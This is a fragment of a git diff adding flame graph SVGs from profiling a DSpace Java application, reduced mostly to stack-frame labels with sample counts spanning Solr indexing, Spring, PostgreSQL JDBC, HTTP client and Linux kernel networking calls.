+org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::query (2 samples, 0.96%) + + + +__skb_datagram_iter (2 samples, 0.96%) + + + +[libjvm.so] (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%) + + + +java/lang/String:::toLowerCase (2 samples, 0.96%) + + + +__x64_sys_recvfrom (20 samples, 9.57%) +__x64_sys_rec.. + + +reweight_entity (1 samples, 0.48%) + + + +[libjvm.so] (4 samples, 1.91%) +[.. + + +org/dspace/content/Item:::getBundles (9 samples, 4.31%) +org/d.. + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (1 samples, 0.48%) + + + +tcp_push (14 samples, 6.70%) +tcp_push + + +org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.48%) + + + +org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.48%) + + + +org/apache/http/impl/io/ChunkedOutputStream:::close (1 samples, 0.48%) + + + +ktime_get_ts64 (1 samples, 0.48%) + + + +__cgroup_bpf_run_filter_skb (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%) + + + +__ip_finish_output (7 samples, 3.35%) +__i.. + + +__vfs_write (1 samples, 0.48%) + + + +java/util/HashMap$ValueIterator:::next (1 samples, 0.48%) + + + +x86_pmu_enable (16 samples, 7.66%) +x86_pmu_en.. + + +org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineRoute (1 samples, 0.48%) + + + +org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.48%) + + + +org/springframework/beans/factory/support/AbstractBeanFactory:::isTypeMatch (2 samples, 0.96%) + + + +__vfprintf_internal (2 samples, 0.96%) + + + +org/springframework/core/env/AbstractEnvironment:::<init> (16 samples, 7.66%) +org/spring.. + + +org/dspace/core/PluginManager:::getNamedPlugin (1 samples, 0.48%) + + + +intel_tfa_pmu_enable_all (24 samples, 11.48%) +intel_tfa_pmu_ena.. 
+ + +java/lang/String:::intern (1 samples, 0.48%) + + + +iptable_security_hook (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::next (1 samples, 0.48%) + + + +sk_wait_data (17 samples, 8.13%) +sk_wait_data + + +default_wake_function (1 samples, 0.48%) + + + +inet6_recvmsg (20 samples, 9.57%) +inet6_recvmsg + + +entry_SYSCALL_64_after_hwframe (1 samples, 0.48%) + + + +update_cfs_group (1 samples, 0.48%) + + + +org/apache/log4j/Category:::info (5 samples, 2.39%) +o.. + + +org/apache/http/impl/conn/DefaultClientConnection:::receiveResponseHeader (1 samples, 0.48%) + + + +java/net/SocketInputStream:::read (1 samples, 0.48%) + + + +activate_task (1 samples, 0.48%) + + + +sock_recvmsg (20 samples, 9.57%) +sock_recvmsg + + +[libjvm.so] (2 samples, 0.96%) + + + +org/dspace/content/Item:::getCommunities (2 samples, 0.96%) + + + +call_stub (134 samples, 64.11%) +call_stub + + +__hrtimer_run_queues (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (9 samples, 4.31%) +org/a.. + + +itable stub (1 samples, 0.48%) + + + +ip_finish_output (8 samples, 3.83%) +ip_f.. + + +__x64_sys_poll (2 samples, 0.96%) + + + +java/lang/Throwable:::printStackTrace (1 samples, 0.48%) + + + +org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.48%) + + + +entry_SYSCALL_64_after_hwframe (1 samples, 0.48%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.48%) + + + +jshort_disjoint_arraycopy (2 samples, 0.96%) + + + +_register_finalizer_Java (1 samples, 0.48%) + + + +java/security/AccessController:::doPrivileged (1 samples, 0.48%) + + + +schedule_hrtimeout_range (2 samples, 0.96%) + + + +org/dspace/content/Collection:::<init> (2 samples, 0.96%) + + + +call_stub (2 samples, 0.96%) + + + +java/lang/String:::split (1 samples, 0.48%) + + + +java/util/Formatter:::format (5 samples, 2.39%) +j.. + + +java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.48%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.48%) + + + +smp_apic_timer_interrupt (1 samples, 0.48%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.96%) + + + +org/dspace/storage/rdbms/TableRowIterator:::<init> (1 samples, 0.48%) + + + +inet_send_prepare (1 samples, 0.48%) + + + +Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.48%) + + + +__alloc_skb (1 samples, 0.48%) + + + +pollwake (1 samples, 0.48%) + + + +org/apache/http/impl/conn/DefaultHttpResponseParser:::parseHead (1 samples, 0.48%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::receiveResponseHeader (1 samples, 0.48%) + + + +__sys_recvfrom (20 samples, 9.57%) +__sys_recvfrom + + +org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getName (7 samples, 3.35%) +org.. + + +java/util/Arrays:::sort (1 samples, 0.48%) + + + +__tcp_transmit_skb (14 samples, 6.70%) +__tcp_tra.. + + +x86_pmu_enable (24 samples, 11.48%) +x86_pmu_enable + + +do_syscall_64 (20 samples, 9.57%) +do_syscall_64 + + +org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.48%) + + + +org/dspace/discovery/SolrServiceImpl:::writeDocument (41 samples, 19.62%) +org/dspace/discovery/SolrServi.. + + +org/dspace/content/Item:::decache (1 samples, 0.48%) + + + +org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (2 samples, 0.96%) + + + +queued_spin_lock_slowpath (1 samples, 0.48%) + + + +org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (12 samples, 5.74%) +org/apa.. 
+ + +org/apache/http/client/utils/URIUtils:::rewriteURI (1 samples, 0.48%) + + + +java/net/SocketInputStream:::socketRead0 (4 samples, 1.91%) +j.. + + +[libjvm.so] (1 samples, 0.48%) + + + +Interpreter (134 samples, 64.11%) +Interpreter + + +org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineProxy (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.48%) + + + +__sched_text_start (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/util/ClientUtils:::toQueryString (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::process (2 samples, 0.96%) + + + +org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.48%) + + + +JVM_DoPrivileged (4 samples, 1.91%) +J.. + + +[libjvm.so] (134 samples, 64.11%) +[libjvm.so] + + +import_single_range (1 samples, 0.48%) + + + +org/apache/commons/logging/LogFactory:::getFactory (3 samples, 1.44%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.48%) + + + +schedule (24 samples, 11.48%) +schedule + + +java/util/regex/Pattern$GroupTail:::match (1 samples, 0.48%) + + + +java/lang/ThreadLocal$ThreadLocalMap:::set (1 samples, 0.48%) + + + +poll_schedule_timeout.constprop.0 (1 samples, 0.48%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (8 samples, 3.83%) +org/.. + + +__wake_up_sync_key (1 samples, 0.48%) + + + +org/dspace/discovery/SolrServiceImpl:::buildDocument (108 samples, 51.67%) +org/dspace/discovery/SolrServiceImpl:::buildDocument + + +[libjvm.so] (2 samples, 0.96%) + + + +org/apache/http/entity/mime/MultipartEntity:::writeTo (12 samples, 5.74%) +org/apa.. + + +ip_local_out (13 samples, 6.22%) +ip_local.. + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.48%) + + + +schedule_timeout (17 samples, 8.13%) +schedule_ti.. + + +do_futex (24 samples, 11.48%) +do_futex + + +org/apache/http/client/utils/URIBuilder:::digestURI (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.48%) + + + +wait_woken (17 samples, 8.13%) +wait_woken + + +java/lang/Class:::getMethod0 (1 samples, 0.48%) + + + +org/dspace/text/filter/InitialArticleWord:::filter (1 samples, 0.48%) + + + +java/net/SocketInputStream:::read (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (9 samples, 4.31%) +org/a.. + + +__sys_sendto (19 samples, 9.09%) +__sys_sendto + + +[libjvm.so] (1 samples, 0.48%) + + + +nf_ct_seq_offset (1 samples, 0.48%) + + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::instantiateBean (1 samples, 0.48%) + + + +org/springframework/beans/TypeConverterDelegate:::convertIfNecessary (16 samples, 7.66%) +org/spring.. 
+ + +inet_ehashfn (1 samples, 0.48%) + + + +[libjvm.so] (2 samples, 0.96%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.48%) + + + +org/apache/http/client/protocol/RequestDefaultHeaders:::process (1 samples, 0.48%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.48%) + + + +java/lang/Class:::getConstructor0 (1 samples, 0.48%) + + + +java/net/SocketInputStream:::read (1 samples, 0.48%) + + + +__kmalloc_node_track_caller (1 samples, 0.48%) + + + +java/util/regex/Pattern$GroupHead:::match (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/TableRow:::resetChanged (1 samples, 0.48%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendQuery (1 samples, 0.48%) + + + +deactivate_task (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%) + + + +org/apache/log4j/DefaultThrowableRenderer:::render (1 samples, 0.48%) + + + +__perf_event_task_sched_in (24 samples, 11.48%) +__perf_event_task.. + + +jlong_disjoint_arraycopy (1 samples, 0.48%) + + + +sun/reflect/DelegatingMethodAccessorImpl:::invoke (134 samples, 64.11%) +sun/reflect/DelegatingMethodAccessorImpl:::invoke + + +org/springframework/core/convert/support/GenericConversionService:::getMatchableConverters (1 samples, 0.48%) + + + +ip_output (8 samples, 3.83%) +ip_o.. + + +__poll (1 samples, 0.48%) + + + +ip_rcv (4 samples, 1.91%) +i.. + + +org/dspace/browse/BrowseIndex:::<init> (1 samples, 0.48%) + + + +java (209 samples, 100.00%) +java + + +[libjvm.so] (1 samples, 0.48%) + + + +org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.48%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::determineRoute (1 samples, 0.48%) + + + +java/lang/Throwable:::printStackTrace (1 samples, 0.48%) + + + +Interpreter (134 samples, 64.11%) +Interpreter + + +org/dspace/discovery/configuration/DiscoverySearchFilter:::getFilterType (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (2 samples, 0.96%) + + + +__generic_file_write_iter (1 samples, 0.48%) + + + +[libjvm.so] (134 samples, 64.11%) +[libjvm.so] + + +org/postgresql/jdbc/PgStatement:::executeInternal (2 samples, 0.96%) + + + +Interpreter (134 samples, 64.11%) +Interpreter + + +org/apache/log4j/Category:::callAppenders (1 samples, 0.48%) + + + +JVM_InternString (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::getTimestamp (1 samples, 0.48%) + + + +nft_do_chain (1 samples, 0.48%) + + + +do_syscall_64 (1 samples, 0.48%) + + + +org/apache/log4j/WriterAppender:::append (5 samples, 2.39%) +o.. + + +tcp_recvmsg (19 samples, 9.09%) +tcp_recvmsg + + +org/dspace/authorize/AuthorizeManager:::getPoliciesActionFilter (2 samples, 0.96%) + + + +tick_sched_handle (1 samples, 0.48%) + + + +__poll (2 samples, 0.96%) + + + +jshort_disjoint_arraycopy (1 samples, 0.48%) + + + +[libjava.so] (1 samples, 0.48%) + + + +org/apache/http/protocol/BasicHttpContext:::getAttribute (1 samples, 0.48%) + + + +org/apache/http/impl/client/RequestWrapper:::getRequestLine (1 samples, 0.48%) + + + +__sched_text_start (24 samples, 11.48%) +__sched_text_start + + +org/apache/http/client/methods/HttpPost:::<init> (1 samples, 0.48%) + + + +org/dspace/sort/OrderFormat:::makeSortString (2 samples, 0.96%) + + + +call_stub (2 samples, 0.96%) + + + +call_stub (1 samples, 0.48%) + + + +org/dspace/app/util/DailyFileAppender:::subAppend (5 samples, 2.39%) +o.. 
+ + +hrtimer_interrupt (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%) + + + +__x64_sys_write (1 samples, 0.48%) + + + +sun/reflect/GeneratedConstructorAccessor19:::newInstance (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (7 samples, 3.35%) +org.. + + +apic_timer_interrupt (1 samples, 0.48%) + + + +tcp_sendmsg_locked (16 samples, 7.66%) +tcp_sendms.. + + + diff --git a/docs/2020/02/out.dspace58-2.svg b/docs/2020/02/out.dspace58-2.svg new file mode 100644 index 000000000..41eb96220 --- /dev/null +++ b/docs/2020/02/out.dspace58-2.svg @@ -0,0 +1,7088 @@ + + + + + + + + + + + + + + +Flame Graph + +Reset Zoom +Search +ic + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +acpi_hw_read_port (1 samples, 0.09%) + + + +refcount_inc_not_zero_checked (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%) + + + +java/util/Arrays:::copyOf (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +java/util/LinkedList:::linkFirst (3 samples, 0.27%) + + + +skb_clone (2 samples, 0.18%) + + + +do_IRQ (1 samples, 0.09%) + + + +nf_confirm (1 samples, 0.09%) + + + +[libjvm.so] (3 samples, 0.27%) + + + +org/apache/http/message/BasicHeaderValueParser:::parseElements (1 samples, 0.09%) + + + +nvme_complete_rq (1 samples, 0.09%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (39 samples, 3.55%) +org.. + + +org/dspace/app/util/DailyFileAppender:::subAppend (10 samples, 0.91%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::clearParameters (1 samples, 0.09%) + + + +__perf_event_task_sched_in (13 samples, 1.18%) + + + +bbr_update_model (1 samples, 0.09%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%) + + + +org/apache/http/impl/conn/HttpPoolEntry:::close (1 samples, 0.09%) + + + +_itoa_word (1 samples, 0.09%) + + + +perf_pmu_disable.part.0 (1 samples, 0.09%) + + + +acpi_ev_sci_xrupt_handler (1 samples, 0.09%) + + + +__intel_pmu_enable_all.constprop.0 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.09%) + + + +acpi_irq (1 samples, 0.09%) + + + +memset_erms (1 samples, 0.09%) + + + +inet6_recvmsg (44 samples, 4.01%) +inet.. + + +link_path_walk.part.0 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%) + + + +syscall_trace_enter (1 samples, 0.09%) + + + +org/apache/http/impl/io/AbstractSessionOutputBuffer:::flushBuffer (1 samples, 0.09%) + + + +org/dspace/content/Item:::getID (1 samples, 0.09%) + + + +java/lang/reflect/Proxy:::newProxyInstance (2 samples, 0.18%) + + + +walk_component (1 samples, 0.09%) + + + +sun/reflect/DelegatingMethodAccessorImpl:::invoke (747 samples, 68.03%) +sun/reflect/DelegatingMethodAccessorImpl:::invoke + + +ip_build_and_send_pkt (1 samples, 0.09%) + + + +__ip_finish_output (1 samples, 0.09%) + + + +__libc_recv (55 samples, 5.01%) +__libc.. 
+ + +ext4_reserve_inode_write (2 samples, 0.18%) + + + +org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +jshort_disjoint_arraycopy (1 samples, 0.09%) + + + +__wake_up (1 samples, 0.09%) + + + +__x86_indirect_thunk_rax (1 samples, 0.09%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.09%) + + + +smp_apic_timer_interrupt (1 samples, 0.09%) + + + +perf_event_sched_in (1 samples, 0.09%) + + + +__sched_text_start (30 samples, 2.73%) +__.. + + +dev_queue_xmit (7 samples, 0.64%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +syscall_slow_exit_work (1 samples, 0.09%) + + + +deactivate_task (11 samples, 1.00%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.27%) + + + +java/net/SocketInputStream:::read (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/TableRowIterator:::hasNext (2 samples, 0.18%) + + + +org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%) + + + +[libjvm.so] (3 samples, 0.27%) + + + +tcp_stream_memory_free (1 samples, 0.09%) + + + +generic_update_time (2 samples, 0.18%) + + + +org/dspace/storage/rdbms/TableRow:::setColumn (1 samples, 0.09%) + + + +lookup_slow (1 samples, 0.09%) + + + +__softirqentry_text_start (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (7 samples, 0.64%) + + + +java/lang/String:::equals (1 samples, 0.09%) + + + +org/apache/http/protocol/HttpRequestExecutor:::preProcess (3 samples, 0.27%) + + + +org/springframework/core/convert/support/MapToMapConverter:::getConvertibleTypes (1 samples, 0.09%) + + + +__tcp_transmit_skb (144 samples, 13.11%) +__tcp_transmit_skb + + +[libjvm.so] (2 samples, 0.18%) + + + +sched_clock_cpu (1 samples, 0.09%) + + + +org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (5 samples, 0.46%) + + + +Java_java_net_SocketOutputStream_socketWrite0 (2 samples, 0.18%) + + + +org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%) + + + +Interpreter (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +perf_event_task_tick (1 samples, 0.09%) + + + +ip_local_out (1 samples, 0.09%) + + + +do_IRQ (1 samples, 0.09%) + + + +org/apache/http/entity/AbstractHttpEntity:::getContentType (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%) + + + +java/util/ArrayList$Itr:::next (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%) + + + +new_sync_write (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::execute (5 samples, 0.46%) + + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%) + + + +ipv4_conntrack_local (1 samples, 0.09%) + + + +futex_wait (61 samples, 5.56%) +futex_w.. 
+ + +clone_endio (1 samples, 0.09%) + + + +__entry_text_start (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (2 samples, 0.18%) + + + +org/dspace/storage/rdbms/TableRowIterator:::hasNext (1 samples, 0.09%) + + + +update_process_times (1 samples, 0.09%) + + + +autoremove_wake_function (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +java/util/regex/Pattern$CharProperty:::study (2 samples, 0.18%) + + + +__ext4_get_inode_loc (1 samples, 0.09%) + + + +ip_queue_xmit (1 samples, 0.09%) + + + +tcp_connect (1 samples, 0.09%) + + + +perf_event_sched_in (1 samples, 0.09%) + + + +Java_java_io_FileOutputStream_writeBytes (3 samples, 0.27%) + + + +ip_local_deliver (62 samples, 5.65%) +ip_loca.. + + +java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%) + + + +__hrtimer_run_queues (1 samples, 0.09%) + + + +generic_write_end (1 samples, 0.09%) + + + +Interpreter (1 samples, 0.09%) + + + +[libjvm.so] (13 samples, 1.18%) + + + +do_filp_open (1 samples, 0.09%) + + + +java/util/regex/Pattern$5:::isSatisfiedBy (1 samples, 0.09%) + + + +java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.09%) + + + +java/util/regex/Pattern$Ques:::study (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%) + + + +org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (12 samples, 1.09%) + + + +schedule (1 samples, 0.09%) + + + +bio_endio (1 samples, 0.09%) + + + +__tcp_transmit_skb (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::find (17 samples, 1.55%) + + + +activate_task (12 samples, 1.09%) + + + +lock_sock_nested (1 samples, 0.09%) + + + +java/text/SimpleDateFormat:::format (2 samples, 0.18%) + + + +JVM_InternString (5 samples, 0.46%) + + + +rcu_core (1 samples, 0.09%) + + + +nf_conntrack_in (6 samples, 0.55%) + + + +inet_shutdown (1 samples, 0.09%) + + + +irqtime_account_irq (1 samples, 0.09%) + + + +swapgs_restore_regs_and_return_to_usermode (1 samples, 0.09%) + + + +org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (3 samples, 0.27%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (7 samples, 0.64%) + + + +org/apache/http/impl/conn/DefaultClientConnection:::close (1 samples, 0.09%) + + + +entry_SYSCALL_64_after_hwframe (61 samples, 5.56%) +entry_S.. + + +finish_task_switch (1 samples, 0.09%) + + + +java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.09%) + + + +org/dspace/browse/BrowseIndex:::getTableName (1 samples, 0.09%) + + + +org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%) + + + +__ip_queue_xmit (1 samples, 0.09%) + + + +__list_del_entry_valid (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +schedule (30 samples, 2.73%) +sc.. + + +rcu_core_si (1 samples, 0.09%) + + + +java/lang/StringCoding:::encode (1 samples, 0.09%) + + + +ksys_write (2 samples, 0.18%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +ctx_sched_in (1 samples, 0.09%) + + + +org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (40 samples, 3.64%) +org/.. 
+ + +sk_forced_mem_schedule (1 samples, 0.09%) + + + +do_syscall_64 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +[libjvm.so] (3 samples, 0.27%) + + + +do_syscall_64 (1 samples, 0.09%) + + + +java/net/SocketInputStream:::read (1 samples, 0.09%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (21 samples, 1.91%) +o.. + + +tcp_rcv_established (1 samples, 0.09%) + + + +java/util/regex/Pattern$Begin:::match (1 samples, 0.09%) + + + +jbyte_disjoint_arraycopy (1 samples, 0.09%) + + + +java/net/SocketInputStream:::read (1 samples, 0.09%) + + + +nf_nat_packet (1 samples, 0.09%) + + + +__kfree_skb (2 samples, 0.18%) + + + +java/lang/String:::hashCode (1 samples, 0.09%) + + + +sock_sendmsg (187 samples, 17.03%) +sock_sendmsg + + +call_stub (7 samples, 0.64%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%) + + + +apic_timer_interrupt (1 samples, 0.09%) + + + +java/lang/String:::intern (6 samples, 0.55%) + + + +java/util/concurrent/ConcurrentHashMap:::transfer (1 samples, 0.09%) + + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%) + + + +Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%) + + + +__intel_pmu_disable_all (1 samples, 0.09%) + + + +do_syscall_64 (205 samples, 18.67%) +do_syscall_64 + + +java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (8 samples, 0.73%) + + + +java/lang/StringCoding:::decode (2 samples, 0.18%) + + + +hrtimer_interrupt (1 samples, 0.09%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (9 samples, 0.82%) + + + +jshort_arraycopy (1 samples, 0.09%) + + + +Interpreter (1 samples, 0.09%) + + + +tcp_v6_conn_request (1 samples, 0.09%) + + + +__entry_text_start (1 samples, 0.09%) + + + +java/net/SocketTimeoutException:::<init> (7 samples, 0.64%) + + + +sockfd_lookup_light (4 samples, 0.36%) + + + +[libjvm.so] (5 samples, 0.46%) + + + +__x64_sys_poll (6 samples, 0.55%) + + + +ret_from_intr (1 samples, 0.09%) + + + +sun/reflect/NativeMethodAccessorImpl:::invoke (747 samples, 68.03%) +sun/reflect/NativeMethodAccessorImpl:::invoke + + +x86_pmu_disable (1 samples, 0.09%) + + + +org/apache/commons/dbcp/DelegatingResultSet:::wasNull (1 samples, 0.09%) + + + +__ip_finish_output (108 samples, 9.84%) +__ip_finish_ou.. 
+ + +switch_fpu_return (3 samples, 0.27%) + + + +itable stub (1 samples, 0.09%) + + + +org/apache/http/impl/client/AbstractHttpClient:::getBackoffManager (1 samples, 0.09%) + + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (4 samples, 0.36%) + + + +select_task_rq_fair (3 samples, 0.27%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (8 samples, 0.73%) + + + +JVM_GetDeclaringClass (1 samples, 0.09%) + + + +jlong_disjoint_arraycopy (1 samples, 0.09%) + + + +__vfs_write (2 samples, 0.18%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (3 samples, 0.27%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%) + + + +org/apache/solr/common/util/JavaBinCodec:::readVal (2 samples, 0.18%) + + + +org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.27%) + + + +Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.18%) + + + +__vfs_write (1 samples, 0.09%) + + + +java/util/regex/Pattern$Curly:::match0 (2 samples, 0.18%) + + + +smp_apic_timer_interrupt (1 samples, 0.09%) + + + +schedule (1 samples, 0.09%) + + + +Interpreter (745 samples, 67.85%) +Interpreter + + +java/util/regex/Pattern$Curly:::match (3 samples, 0.27%) + + + +ext4_mark_iloc_dirty (1 samples, 0.09%) + + + +exit_to_usermode_loop (1 samples, 0.09%) + + + +update_load_avg (1 samples, 0.09%) + + + +[libjvm.so] (1 samples, 0.09%) + + + +sk_page_frag_refill (1 samples, 0.09%) + + + +org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingletonNames (1 samples, 0.09%) + + + +org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%) + + + +org/dspace/storage/rdbms/TableRowIterator:::hasNext (3 samples, 0.27%) + + + +_copy_from_iter_full (2 samples, 0.18%) + + + +org/apache/http/client/protocol/RequestDefaultHeaders:::process (1 samples, 0.09%) + + + +account_entity_enqueue (2 samples, 0.18%) + + + +enqueue_entity (2 samples, 0.18%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (3 samples, 0.27%) + + + +java/util/regex/Pattern:::sequence (6 samples, 0.55%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%) + + + +java/util/Calendar:::<init> (1 samples, 0.09%) + + + +blk_mq_end_request (1 samples, 0.09%) + + + +__fsnotify_parent (1 samples, 0.09%) + + + +inet6_recvmsg (1 samples, 0.09%) + + + +java/net/SocketInputStream:::read (2 samples, 0.18%) + + + +psi_task_change (7 samples, 0.64%) + + + +apic_timer_interrupt (1 samples, 0.09%) + + + +ttwu_do_activate (14 samples, 1.28%) + + + +ipv4_conntrack_defrag (1 samples, 0.09%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%) + + + +org/dspace/core/Context:::cache (1 samples, 0.09%) + + + +java/lang/String:::toLowerCase (1 samples, 0.09%) + + + +org/apache/http/entity/mime/Header:::addField (12 samples, 1.09%) + + + +__hrtimer_run_queues (1 samples, 0.09%) + + + +JNU_ThrowByName (7 samples, 0.64%) + + + +__wake_up_common_lock (1 samples, 0.09%) + + + +org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (49 samples, 4.46%) +org/a.. 
